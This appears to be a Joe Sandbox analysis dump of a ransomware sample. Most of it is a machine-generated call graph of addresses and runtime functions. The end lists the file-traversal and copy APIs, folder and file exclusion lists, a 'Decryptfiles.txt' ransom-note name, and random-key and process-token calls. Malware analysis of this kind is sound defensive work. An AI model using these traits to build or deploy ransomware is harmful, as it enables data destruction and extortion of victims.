e9cc61 50262 e9c3ae 26 API calls __cftof 50257->50262 50260->49617 50261->50257 50262->50260 50263->50260 50265 ea4415 50264->50265 50268 ea441b 50264->50268 50291 ea4c31 11 API calls 2 library calls 50265->50291 50270 ea4421 50268->50270 50292 ea4c87 11 API calls 2 library calls 50268->50292 50269 ea4435 50271 ea44a6 SetLastError 50269->50271 50293 ea4088 50269->50293 50270->50271 50273 ea4426 50270->50273 50277 ea449a SetLastError 50270->50277 50312 e9f226 45 API calls __FrameHandler3::FrameUnwindToState 50271->50312 50273->50271 50275 ea44b2 50277->49620 50278 ea444d 50302 ea4c87 11 API calls 2 library calls 50278->50302 50279 ea4462 50309 ea4c87 11 API calls 2 library calls 50279->50309 50282 ea446e 50284 ea4472 50282->50284 50285 ea4481 50282->50285 50283 ea4459 50303 ea4646 50283->50303 50310 ea4c87 11 API calls 2 library calls 50284->50310 50311 ea4229 20 API calls __Getctype 50285->50311 50289 ea448c 50290 ea4646 _free 20 API calls 50289->50290 50290->50270 50291->50268 50292->50269 50294 ea4095 50293->50294 50295 ea40d5 50294->50295 50296 ea40c0 HeapAlloc 50294->50296 50300 ea40a9 __Getctype 50294->50300 50314 e9ca3d 20 API calls _free 50295->50314 50297 ea40d3 50296->50297 50296->50300 50299 ea40da 50297->50299 50299->50278 50299->50279 50300->50295 50300->50296 50313 e9fba8 7 API calls 2 library calls 50300->50313 50302->50283 50304 ea4651 RtlFreeHeap 50303->50304 50308 ea467a _free 50303->50308 50305 ea4666 50304->50305 50304->50308 50315 e9ca3d 20 API calls _free 50305->50315 50307 ea466c GetLastError 50307->50308 50308->50273 50309->50282 50310->50283 50311->50289 50312->50275 50313->50300 50314->50299 50315->50307 50321 ea6049 __Getctype 50316->50321 50317 ea6087 50326 e9ca3d 20 API calls _free 50317->50326 50319 ea6072 RtlAllocateHeap 50320 ea6085 50319->50320 50319->50321 50320->49627 50321->50317 50321->50319 50325 e9fba8 7 API calls 2 library calls 50321->50325 50323->49634 50324->49627 50325->50321 50326->50320 50328 ea4088 __Getctype 20 API 
calls 50327->50328 50329 e98eb6 50328->50329 50330 ea4646 _free 20 API calls 50329->50330 50331 e98ec3 50330->50331 50332 e98eca GetModuleHandleExW 50331->50332 50333 e98ee7 50331->50333 50332->50333 50334 e98e17 22 API calls 50333->50334 50335 e98eef 50334->50335 50335->49643 50335->49645 50336->49640 50337->49644 50338->49645 50340 e98e47 50339->50340 50341 e98e23 50339->50341 50340->49644 50342 e98e29 CloseHandle 50341->50342 50343 e98e32 50341->50343 50342->50343 50344 e98e38 FreeLibrary 50343->50344 50345 e98e41 50343->50345 50344->50345 50346 ea4646 _free 20 API calls 50345->50346 50346->50340 50348 e98da5 _unexpected 50347->50348 50349 e98db9 50348->50349 50350 e98dac GetLastError ExitThread 50348->50350 50351 ea43ff __Getctype 45 API calls 50349->50351 50352 e98dbe 50351->50352 50363 ea5fd1 50352->50363 50355 e98dd5 50357 e98df1 50355->50357 50368 e337c0 CreateEventW 50355->50368 50400 e98f7c 23 API calls 50357->50400 50364 ea5fe2 GetPEB 50363->50364 50367 e98dc9 50363->50367 50365 ea5ff5 50364->50365 50364->50367 50401 ea4a16 50365->50401 50367->50355 50399 ea4fa2 10 API calls 2 library calls 50367->50399 50369 e337f2 GetLastError 50368->50369 50370 e33828 CreateEventW 50368->50370 50374 e33802 50369->50374 50371 e33842 GetLastError 50370->50371 50372 e33879 50370->50372 50378 e33852 50371->50378 50373 e98ef7 190 API calls 50372->50373 50375 e33898 50373->50375 50376 e33916 50374->50376 50377 e33825 50374->50377 50379 e338f3 50375->50379 50380 e338a8 GetLastError 50375->50380 50382 e33480 78 API calls 50376->50382 50377->50370 50378->50372 50381 e33923 50378->50381 50384 e33903 50379->50384 50385 e338f7 WaitForSingleObject CloseHandle 50379->50385 50387 e338b9 50380->50387 50383 e33480 78 API calls 50381->50383 50382->50381 50386 e33930 50383->50386 50388 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50384->50388 50385->50384 50419 e33480 50386->50419 50390 e338c0 50387->50390 50391 e338bd 
CloseHandle 50387->50391 50392 e33910 50388->50392 50394 e338ca CloseHandle 50390->50394 50395 e338cd 50390->50395 50391->50390 50392->50357 50394->50395 50395->50379 50395->50386 50399->50355 50406 ea493d 50401->50406 50403 ea4a3d 50404 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50403->50404 50405 ea4a67 50404->50405 50405->50367 50407 ea496a 50406->50407 50411 ea4966 __FrameHandler3::FrameUnwindToState 50406->50411 50407->50411 50412 ea4875 50407->50412 50410 ea4984 GetProcAddress 50410->50411 50411->50403 50417 ea4886 ___vcrt_InitializeCriticalSectionEx 50412->50417 50413 ea48a3 LoadLibraryExW 50415 ea48be GetLastError 50413->50415 50413->50417 50414 ea4930 50414->50410 50414->50411 50415->50417 50416 ea4919 FreeLibrary 50416->50417 50417->50413 50417->50414 50417->50416 50418 ea48f1 LoadLibraryExW 50417->50418 50418->50417 50420 e334b7 50419->50420 50425 e331f0 27 API calls 2 library calls 50420->50425 50422 e334d3 50426 e4a200 78 API calls Concurrency::cancel_current_task 50422->50426 50425->50422 50428 e38a65 __cftof 50427->50428 50429 e51c70 78 API calls 50428->50429 50430 e38a75 50429->50430 50718 e38e00 50430->50718 50719 e38e73 __cftof 50718->50719 50799 e7e880 50719->50799 50721 e38e81 50808 e785f0 50721->50808 50723 e38ea1 __cftof 50724 e7e880 80 API calls 50723->50724 50725 e38ec9 50724->50725 50726 e785f0 112 API calls 50725->50726 50727 e38ee6 __cftof 50726->50727 50831 e7c100 50727->50831 50729 e38f14 __cftof 50730 e7c100 80 API calls 50729->50730 50731 e38f42 50730->50731 50839 e7af50 50731->50839 50734 e7af50 _MREFOpen@16 24 API calls 50735 e38f8a __cftof 50734->50735 50736 e48780 _MREFOpen@16 28 API calls 50735->50736 50737 e38ff4 50736->50737 50738 e48780 _MREFOpen@16 28 API calls 50737->50738 50739 e39020 50738->50739 50740 e37670 80 API calls 50739->50740 50744 e3903d error_info_injector 50740->50744 50741 e390bb error_info_injector 50742 e8d73a std::_Facet_Register 28 API calls 
50741->50742 50745 e390e7 50742->50745 50743 e395e1 50871 e9c3be 26 API calls 2 library calls 50743->50871 50744->50741 50744->50743 50747 e51c70 78 API calls 50745->50747 50753 e39105 50747->50753 50754 e48780 _MREFOpen@16 28 API calls 50753->50754 50755 e39182 __cftof 50754->50755 50756 e8d73a std::_Facet_Register 28 API calls 50755->50756 50800 e51c70 78 API calls 50799->50800 50801 e7e8b4 50800->50801 50802 e8d73a std::_Facet_Register 28 API calls 50801->50802 50803 e7e90e 50802->50803 50804 e51c70 78 API calls 50803->50804 50807 e7e942 __cftof 50803->50807 50805 e7e928 50804->50805 50873 e47fd0 50805->50873 50807->50721 50809 e78632 50808->50809 50810 e7862e 50808->50810 50811 e7af50 _MREFOpen@16 24 API calls 50809->50811 50812 e51c70 78 API calls 50810->50812 50811->50810 50813 e78651 50812->50813 50917 e77ee0 BCryptOpenAlgorithmProvider 50813->50917 50815 e78660 50933 e784e0 50815->50933 50817 e7866c BCryptGenRandom 50818 e7867b 50817->50818 50820 e786d4 50817->50820 50819 e7868d BCryptCloseAlgorithmProvider 50818->50819 50824 e78695 50818->50824 50819->50824 50821 e786da SetLastError 50820->50821 50822 e462b0 _MREFOpen@16 28 API calls 50821->50822 50823 e786f1 50822->50823 50974 e78020 80 API calls 3 library calls 50823->50974 50827 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50824->50827 50826 e78701 50828 e8f18a Concurrency::cancel_current_task RaiseException 50826->50828 50829 e786ce 50827->50829 50830 e7870f 50828->50830 50829->50723 50832 e7c139 50831->50832 50833 e51c70 78 API calls 50832->50833 50834 e7c168 50833->50834 51014 e7d310 50834->51014 50838 e7c259 50838->50729 50840 e9d9e8 _Yarn 21 API calls 50839->50840 50847 e7af5f 50840->50847 50841 e38f62 50841->50734 50842 e7af91 Concurrency::cancel_current_task 50844 e8f18a Concurrency::cancel_current_task RaiseException 50842->50844 50843 e8ce57 9 API calls _MREFOpen@16 50843->50847 50845 e7afa9 50844->50845 50846 e9d9e8 _Yarn 21 API 
calls 50846->50847 50847->50841 50847->50842 50847->50843 50847->50846 50874 e48031 50873->50874 50875 e47fff 50873->50875 50894 e462b0 50874->50894 50876 e48003 50875->50876 50885 e7aee0 50875->50885 50876->50807 50883 e8f18a Concurrency::cancel_current_task RaiseException 50884 e4805f 50883->50884 50901 e9da12 50885->50901 50887 e4801d 50887->50807 50888 e8ce57 9 API calls _MREFOpen@16 50890 e7aef1 50888->50890 50889 e7af25 Concurrency::cancel_current_task 50891 e8f18a Concurrency::cancel_current_task RaiseException 50889->50891 50890->50887 50890->50888 50890->50889 50893 e9da12 27 API calls 50890->50893 50892 e7af3d 50891->50892 50893->50890 50895 e462d3 50894->50895 50896 e48780 _MREFOpen@16 28 API calls 50895->50896 50897 e462e5 50896->50897 50898 e34a50 50897->50898 50899 e462f0 _MREFOpen@16 78 API calls 50898->50899 50900 e34aa0 50899->50900 50900->50883 50902 e9da1d 50901->50902 50905 e9da34 50902->50905 50906 e9da43 50905->50906 50907 e9daa7 50905->50907 50906->50907 50910 e9da58 50906->50910 50908 e9ca3d _free 20 API calls 50907->50908 50909 e9daac 50908->50909 50911 e9c3ae __cftof 26 API calls 50909->50911 50913 e9da82 50910->50913 50914 e9da75 50910->50914 50912 e9da2f 50911->50912 50912->50890 50916 e9d9e8 _Yarn 21 API calls 50913->50916 50915 e9ca3d _free 20 API calls 50914->50915 50915->50912 50916->50912 50918 e77f27 50917->50918 50919 e77f43 50917->50919 50920 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50918->50920 50922 e77f49 SetLastError 50919->50922 50921 e77f3f 50920->50921 50921->50815 50923 e462b0 _MREFOpen@16 28 API calls 50922->50923 50924 e77f60 50923->50924 50975 e78020 80 API calls 3 library calls 50924->50975 50926 e77f73 50927 e8f18a Concurrency::cancel_current_task RaiseException 50926->50927 50928 e77f81 50927->50928 50976 e8ee1e 27 API calls 2 library calls 50928->50976 50930 e77fd7 50931 e462f0 _MREFOpen@16 78 API calls 50930->50931 50932 e77ff9 50931->50932 
50932->50815 50934 e78522 50933->50934 50935 e7859e 50933->50935 50953 e78572 __Mtx_unlock 50934->50953 50977 e8caa7 50934->50977 50980 e8d658 6 API calls 50935->50980 50938 e785a8 50938->50934 50981 e8ca86 50938->50981 50940 e785e0 50944 e8bfee 79 API calls 50940->50944 50941 e78548 50945 e8d73a std::_Facet_Register 28 API calls 50941->50945 50941->50953 50947 e785e6 50944->50947 50948 e7855d 50945->50948 50946 e8d9a6 29 API calls 50949 e785ce 50946->50949 50952 e7af50 _MREFOpen@16 24 API calls 50947->50952 50955 e7862e 50947->50955 50951 e77ee0 82 API calls 50948->50951 50948->50953 50984 e8d60e EnterCriticalSection LeaveCriticalSection WakeAllConditionVariable SetEvent ResetEvent 50949->50984 50951->50953 50952->50955 50953->50817 50954 e51c70 78 API calls 50956 e78651 50954->50956 50955->50954 50957 e77ee0 82 API calls 50956->50957 50958 e78660 50957->50958 50959 e784e0 106 API calls 50958->50959 50960 e7866c BCryptGenRandom 50959->50960 50961 e786d4 50960->50961 50962 e7867b 50960->50962 50964 e786da SetLastError 50961->50964 50963 e7868d BCryptCloseAlgorithmProvider 50962->50963 50967 e78695 50962->50967 50963->50967 50965 e462b0 _MREFOpen@16 28 API calls 50964->50965 50966 e786f1 50965->50966 50985 e78020 80 API calls 3 library calls 50966->50985 50970 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50967->50970 50969 e78701 50971 e8f18a Concurrency::cancel_current_task RaiseException 50969->50971 50972 e786ce 50970->50972 50973 e7870f 50971->50973 50972->50817 50974->50826 50975->50926 50976->50930 50986 e8c869 50977->50986 50980->50938 51008 e8c811 50981->51008 50983 e785c4 50983->50946 50984->50934 50985->50969 50987 e8c8bf 50986->50987 50988 e8c891 GetCurrentThreadId 50986->50988 50991 e8c923 50987->50991 50992 e8c8c3 GetCurrentThreadId 50987->50992 50989 e8c89c GetCurrentThreadId 50988->50989 50990 e8c8b7 50988->50990 50989->50990 50996 e8d512 
__ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 50990->50996 50993 e8c9bc GetCurrentThreadId 50991->50993 50995 e8c943 50991->50995 51000 e8c8ce 50992->51000 50993->51000 50994 e8c9f3 GetCurrentThreadId 50994->50990 51004 e8be9b 50995->51004 50998 e7853d 50996->50998 50998->50940 50998->50941 51000->50990 51000->50994 51001 e8c973 GetCurrentThreadId 51001->51000 51002 e8c94e __Xtime_diff_to_millis2 51001->51002 51002->50990 51002->51000 51002->51001 51003 e8be9b _xtime_get 2 API calls 51002->51003 51003->51002 51005 e8beaa 51004->51005 51007 e8beb7 __aulldvrm 51004->51007 51006 e8be74 __Xtime_get_ticks GetSystemTimePreciseAsFileTime GetSystemTimeAsFileTime 51005->51006 51005->51007 51006->51007 51007->51002 51009 e8c81e 51008->51009 51010 e8c7dc InitializeCriticalSectionEx 51009->51010 51011 e8c7fa InitializeConditionVariable 51009->51011 51010->50983 51011->50983 51015 e51c70 78 API calls 51014->51015 51016 e7d34b 51015->51016 51017 e8d73a std::_Facet_Register 28 API calls 51016->51017 51018 e7d397 51017->51018 51019 e7af50 _MREFOpen@16 24 API calls 51018->51019 51020 e7c193 51018->51020 51019->51020 51021 e85580 51020->51021 51022 e85589 51021->51022 51023 e8558e 51021->51023 51031 e82bc0 5 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 51022->51031 51024 e855ad 51023->51024 51025 e855a4 51023->51025 51033 e855c0 5 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 51024->51033 51032 e89c00 5 API calls 2 library calls 51025->51032 51029 e855a9 51029->50838 51030 e855b2 51030->50838 51031->51023 51032->51029 51033->51030 51363 e3a1eb GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 51362->51363 51363->49708 51399 e9f66b 51364->51399 51366 e8c7a2 51367 e8c7a7 51366->51367 51413 e8c15f 28 API calls Concurrency::cancel_current_task 51366->51413 51367->49711 51371 e4ac03 51370->51371 51372 e8d512 
__ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 51371->51372 51373 e4ac89 51372->51373 51373->49717 51428 e49ee0 51374->51428 51380 e4cff7 51379->51380 51381 e4d039 51380->51381 51382 e49d90 78 API calls 51380->51382 51384 e480a0 75 API calls 51381->51384 51387 e4d070 51381->51387 51382->51381 51383 e322e0 78 API calls 51385 e4d1d7 51383->51385 51384->51387 51386 e3a55b 51385->51386 51462 e49e50 78 API calls 51385->51462 51386->49743 51387->51383 51400 e9f68c 51399->51400 51401 e9f677 51399->51401 51414 ea503d 51400->51414 51423 e9ca3d 20 API calls _free 51401->51423 51405 e9f67c 51424 e9c3ae 26 API calls __cftof 51405->51424 51406 e9f6af 51406->51366 51409 e9f687 51409->51366 51410 e9f6a0 51426 e9ca3d 20 API calls _free 51410->51426 51412 e9f6ab 51412->51366 51415 ea493d __FrameHandler3::FrameUnwindToState 5 API calls 51414->51415 51416 ea5064 51415->51416 51417 ea508e 51416->51417 51420 ea506d 51416->51420 51427 e9f226 45 API calls __FrameHandler3::FrameUnwindToState 51417->51427 51419 ea5093 51421 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 51420->51421 51422 e9f697 51421->51422 51422->51406 51425 e9ca3d 20 API calls _free 51422->51425 51423->51405 51424->51409 51425->51410 51426->51412 51427->51419 51429 e322e0 78 API calls 51428->51429 51430 e49f59 51429->51430 51431 e8d73a std::_Facet_Register 28 API calls 51430->51431 51432 e49f60 51431->51432 51446 e8c36f 51432->51446 51434 e49f7a 51435 e4a080 79 API calls 51434->51435 51437 e49fab 51435->51437 51436 e49ff3 51439 e43105 51436->51439 51458 e8c589 9 API calls 2 library calls 51436->51458 51437->51436 51438 e322e0 78 API calls 51437->51438 51438->51436 51441 e49cc0 51439->51441 51442 e8d73a std::_Facet_Register 28 API calls 51441->51442 51443 e49cfa 51442->51443 51444 e8c36f std::locale::_Init 51 API calls 51443->51444 51445 e3a2cd 51444->51445 51445->49723 51447 e8c37b __EH_prolog3 51446->51447 
51448 e8bf0d std::_Lockit::_Lockit 7 API calls 51447->51448 51449 e8c386 51448->51449 51450 e8c3b7 51449->51450 51459 e8c4d4 28 API calls 2 library calls 51449->51459 51453 e8bf65 std::_Lockit::~_Lockit 2 API calls 51450->51453 51452 e8c399 51460 e8c4f7 47 API calls std::locale::_Setgloballocale 51452->51460 51455 e8c3f7 std::locale::_Init 51453->51455 51455->51434 51456 e8c3a1 51461 e8c2c7 21 API calls _Yarn 51456->51461 51458->51439 51459->51452 51460->51456 51461->51450 51462->51386 51704 e3af10 51469->51704 51472 e462f0 _MREFOpen@16 78 API calls 51473 e3f08c 51472->51473 51474 e48780 _MREFOpen@16 28 API calls 51473->51474 51475 e3f0ca __cftof 51474->51475 51476 e559a0 80 API calls 51475->51476 51477 e3f10f 51476->51477 51478 e559a0 80 API calls 51477->51478 51479 e3f11b __cftof 51478->51479 51480 e8d73a std::_Facet_Register 28 API calls 51479->51480 51481 e3f136 __cftof 51480->51481 51482 e372c0 80 API calls 51481->51482 51483 e3f160 51482->51483 51484 e363d0 80 API calls 51483->51484 51485 e3f182 51484->51485 51486 e556e0 80 API calls 51485->51486 51487 e3f1f1 51486->51487 51488 e556e0 80 API calls 51487->51488 51489 e3f201 51488->51489 51490 e39ad0 20 API calls 51489->51490 51495 e3f22d error_info_injector 51490->51495 51491 e3f2fd 51712 e9c3be 26 API calls 2 library calls 51491->51712 51492 e3f2d6 error_info_injector 51493 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 51492->51493 51496 e3f2f9 51493->51496 51495->51491 51495->51492 51498 e3f310 51496->51498 51499 e3af10 30 API calls 51498->51499 51500 e3f367 51499->51500 51501 e3af10 30 API calls 51500->51501 51502 e3f37f 51501->51502 51503 e462f0 _MREFOpen@16 78 API calls 51502->51503 51504 e3f395 51503->51504 51505 e48780 _MREFOpen@16 28 API calls 51504->51505 51506 e3f3f1 GetTempPathA 51505->51506 51507 e48780 _MREFOpen@16 28 API calls 51506->51507 51508 e3f436 51507->51508 51713 e4a520 51508->51713 51705 e3af1d __cftof __wsopen_s 51704->51705 
51706 e3af52 RegOpenKeyExW RegGetValueA 51705->51706 51707 e3af9b 51706->51707 51711 e3afca 51706->51711 51710 e48780 _MREFOpen@16 28 API calls 51707->51710 51708 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 51709 e3afd8 51708->51709 51709->51472 51710->51711 51711->51708 51714 e4a543 51713->51714 51714->51714 51715 e4a635 51714->51715 51716 e4a561 51714->51716 51751 e31870 28 API calls _MREFOpen@16 51715->51751 51721 e4a5d9 _Yarn 51716->51721 51949 e9d2c9 51935->51949 51937 e9d3b2 51937->50036 51946 e9d3dd 45 API calls 7 library calls 51937->51946 51939 ea493d __FrameHandler3::FrameUnwindToState 5 API calls 51938->51939 51940 ea4e06 51939->51940 51941 ea4e24 InitializeCriticalSectionAndSpinCount 51940->51941 51942 ea4e0f 51940->51942 51941->51942 51943 e8d512 __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 5 API calls 51942->51943 51944 ea4e3b 51943->51944 51944->50044 51946->50036 51947->50042 51948->50047 51950 e9d2d5 __FrameHandler3::FrameUnwindToState 51949->51950 51955 e9f2ab EnterCriticalSection 51950->51955 51952 e9d2e3 51956 e9d317 51952->51956 51954 e9d30a __wsopen_s 51954->51937 51955->51952 51959 e9f2f3 LeaveCriticalSection 51956->51959 51958 e9d321 51958->51954 51959->51958 51961 ea0a2f 51960->51961 51962 ea0a1d 51960->51962 51973 ea08dd 51961->51973 51981 ea0ab7 GetModuleHandleW 51962->51981 51968 ea0a22 51968->51961 51982 ea0afb 8 API calls __ehhandler$?_StructuredChoreWrapper@_UnrealizedChore@details@Concurrency@@CAXPAV123@@Z 51968->51982 51972 ea0a2e 51972->51961 51974 ea08e9 __FrameHandler3::FrameUnwindToState 51973->51974 51984 e9f2ab EnterCriticalSection 51974->51984 51976 ea08f3 51985 ea0920 51976->51985 51981->51968 51982->51972 51984->51976 51986 ea092c _unexpected 51985->51986 51989 ea0999 51986->51989 51994 ea09c7 51986->51994 52001 ea14e0 20 API calls __FrameHandler3::FrameUnwindToState 51986->52001 51990 ea09b6 51989->51990 51991 ea1769 
53332->53263 53333->53271 53334->53294 53335->53273 53336->53279 53337->53294 53339 ea83bc __fread_nolock 28 API calls 53338->53339 53340 ea846b 53339->53340 53340->53266 53341->53289 53342->53289 53343->53300 53344->53300 53345->53307 53346->53294 53347->53294 53348->53306 53349->53294 53350->53223 53351->53224 53352->53223 53353 ea6ea3 53354 ea6ec8 53353->53354 53355 ea6eb0 53353->53355 53359 ea6f23 53354->53359 53360 ea764a 21 API calls 53354->53360 53367 ea6ec0 53354->53367 53403 e9ca3d 20 API calls _free 53355->53403 53357 ea6eb5 53404 e9c3ae 26 API calls __cftof 53357->53404 53361 ea3c8d __fread_nolock 26 API calls 53359->53361 53360->53359 53362 ea6f3b 53361->53362 53373 ea7dfb 53362->53373 53364 ea6f42 53365 ea3c8d __fread_nolock 26 API calls 53364->53365 53364->53367 53366 ea6f6e 53365->53366 53366->53367 53368 ea3c8d __fread_nolock 26 API calls 53366->53368 53369 ea6f7c 53368->53369 53369->53367 53370 ea3c8d __fread_nolock 26 API calls 53369->53370 53371 ea6f8c 53370->53371 53372 ea3c8d __fread_nolock 26 API calls 53371->53372 53372->53367 53374 ea7e07 __FrameHandler3::FrameUnwindToState 53373->53374 53375 ea7e0f 53374->53375 53376 ea7e27 53374->53376 53471 e9ca2a 20 API calls _free 53375->53471 53378 ea7ee4 53376->53378 53382 ea7e5d 53376->53382 53478 e9ca2a 20 API calls _free 53378->53478 53379 ea7e14 53472 e9ca3d 20 API calls _free 53379->53472 53385 ea7e7b 53382->53385 53386 ea7e66 53382->53386 53383 ea7ee9 53479 e9ca3d 20 API calls _free 53383->53479 53384 ea7e1c __wsopen_s 53384->53364 53405 eabdd1 EnterCriticalSection 53385->53405 53473 e9ca2a 20 API calls _free 53386->53473 53388 ea7e73 53480 e9c3ae 26 API calls __cftof 53388->53480 53391 ea7e81 53393 ea7e9d 53391->53393 53394 ea7eb2 53391->53394 53392 ea7e6b 53474 e9ca3d 20 API calls _free 53392->53474 53475 e9ca3d 20 API calls _free 53393->53475 53406 ea7f05 53394->53406 53399 ea7ea2 53476 e9ca2a 20 API calls _free 53399->53476 53400 ea7ead 53477 ea7edc LeaveCriticalSection __wsopen_s 
53400->53477 53403->53357 53404->53367 53405->53391 53407 ea7f2f 53406->53407 53408 ea7f17 53406->53408 53410 ea8299 53407->53410 53415 ea7f74 53407->53415 53481 e9ca2a 20 API calls _free 53408->53481 53495 e9ca2a 20 API calls _free 53410->53495 53411 ea7f1c 53482 e9ca3d 20 API calls _free 53411->53482 53414 ea829e 53496 e9ca3d 20 API calls _free 53414->53496 53417 ea7f7f 53415->53417 53418 ea7f24 53415->53418 53423 ea7faf 53415->53423 53483 e9ca2a 20 API calls _free 53417->53483 53418->53400 53419 ea7f8c 53497 e9c3ae 26 API calls __cftof 53419->53497 53421 ea7f84 53484 e9ca3d 20 API calls _free 53421->53484 53425 ea7fc8 53423->53425 53426 ea800a 53423->53426 53427 ea7fee 53423->53427 53425->53427 53431 ea7fd5 53425->53431 53429 ea6049 __fread_nolock 21 API calls 53426->53429 53485 e9ca2a 20 API calls _free 53427->53485 53432 ea8021 53429->53432 53430 ea7ff3 53486 e9ca3d 20 API calls _free 53430->53486 53433 eae7a2 __fread_nolock 26 API calls 53431->53433 53435 ea4646 _free 20 API calls 53432->53435 53436 ea8173 53433->53436 53438 ea802a 53435->53438 53439 ea81e9 53436->53439 53441 ea818c GetConsoleMode 53436->53441 53437 ea7ffa 53487 e9c3ae 26 API calls __cftof 53437->53487 53442 ea4646 _free 20 API calls 53438->53442 53443 ea81ed ReadFile 53439->53443 53441->53439 53444 ea819d 53441->53444 53445 ea8031 53442->53445 53446 ea8261 GetLastError 53443->53446 53447 ea8207 53443->53447 53444->53443 53448 ea81a3 ReadConsoleW 53444->53448 53449 ea803b 53445->53449 53450 ea8056 53445->53450 53451 ea826e 53446->53451 53452 ea81c5 53446->53452 53447->53446 53453 ea81de 53447->53453 53448->53453 53455 ea81bf GetLastError 53448->53455 53488 e9ca3d 20 API calls _free 53449->53488 53454 ea8455 __fread_nolock 28 API calls 53450->53454 53493 e9ca3d 20 API calls _free 53451->53493 53468 ea8005 __fread_nolock 53452->53468 53490 e9ca07 20 API calls 2 library calls 53452->53490 53463 ea822c 53453->53463 53464 ea8243 53453->53464 53453->53468 53454->53431 53455->53452 53456 ea4646 
_free 20 API calls 53456->53418 53459 ea8273 53494 e9ca2a 20 API calls _free 53459->53494 53461 ea8040 53489 e9ca2a 20 API calls _free 53461->53489 53491 ea7c2e 31 API calls 3 library calls 53463->53491 53467 ea825a 53464->53467 53464->53468 53492 ea7a86 29 API calls __fread_nolock 53467->53492 53468->53456 53470 ea825f 53470->53468 53471->53379 53472->53384 53473->53392 53474->53388 53475->53399 53476->53400 53477->53384 53478->53383 53479->53388 53480->53384 53481->53411 53482->53418 53483->53421 53484->53419 53485->53430 53486->53437 53487->53468 53488->53461 53489->53468 53490->53468 53491->53468 53492->53470 53493->53459 53494->53468 53495->53414 53496->53419 53497->53418
                                                                                                      APIs
                                                                                                      • GetLastError.KERNEL32(AB1AAB9C,755720D0,00000000,00000000), ref: 00E3DFDB
                                                                                                      • FindFirstFileW.KERNELBASE(?,?,AB1AAB9C,755720D0,00000000,00000000), ref: 00E3E049
                                                                                                      • GetLastError.KERNEL32 ref: 00E3E060
                                                                                                      • GetLastError.KERNEL32 ref: 00E3E062
                                                                                                      • CopyFileA.KERNEL32(?,?,00000001), ref: 00E3E4F5
                                                                                                      • Sleep.KERNELBASE(00000005,00000000,00000000,00000000,?,?,?,?,?,?,boot.inidesktop.inintuser.daticoncache.dbbootsect.bakntuser.dat.logBootfont.binDecryptfiles.txt,0000005F), ref: 00E3EB54
                                                                                                      • FindNextFileW.KERNELBASE(?,00000010,?,boot.inidesktop.inintuser.daticoncache.dbbootsect.bakntuser.dat.logBootfont.binDecryptfiles.txt,0000005F), ref: 00E3EF1D
                                                                                                      • GetLastError.KERNEL32 ref: 00E3EF38
                                                                                                      • FindClose.KERNELBASE(?), ref: 00E3EF46
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000014.00000002.2673132270.0000000000E31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E30000, based on PE: true
                                                                                                      • Associated: 00000014.00000002.2673113160.0000000000E30000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673207261.0000000000EBB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673419597.0000000000EE6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673537123.0000000000EE7000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673596358.0000000000EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000014.00000002.2673621130.0000000000EEE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_20_2_e30000_eryy65ty.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ErrorLast$FileFind$CloseCopyFirstNextSleep
                                                                                                      • String ID: .dll.exe.sys.mof.lnk$/Local Settings$7G$:/Games$:/Program Files$:/Program Files (x86)$:/ProgramData$:/Tor Browser$:/Users/All Users$:/Windows$All Users$AppData/Local$User Data/Default/cache$\Decryptfiles.txt$boot.inidesktop.inintuser.daticoncache.dbbootsect.bakntuser.dat.logBootfont.binDecryptfiles.txt$cache2/entries
                                                                                                      • API String ID: 250153273-973084934
                                                                                                      • Opcode ID: 35a0952843699c4af8d80d535e441db03441ca413e44358948e8ece302236ff4
                                                                                                      • Instruction ID: d1580ff4d55615e202faceb90d806fd39c854ae8aa748d0412a381ca1b0ca2e6
                                                                                                      • Opcode Fuzzy Hash: 35a0952843699c4af8d80d535e441db03441ca413e44358948e8ece302236ff4
                                                                                                      • Instruction Fuzzy Hash: E192BFB1A002188BDB28CB28CC897DDBBB5EB45308F5452DDE509B72C2DB759E88CF55

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00E3ABC8
                                                                                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00E3ABD9
                                                                                                      • Process32NextW.KERNEL32(?,0000022C), ref: 00E3ABF2
                                                                                                      • GetCurrentProcess.KERNEL32(00000020,?), ref: 00E3AC99
                                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00E3ACA0
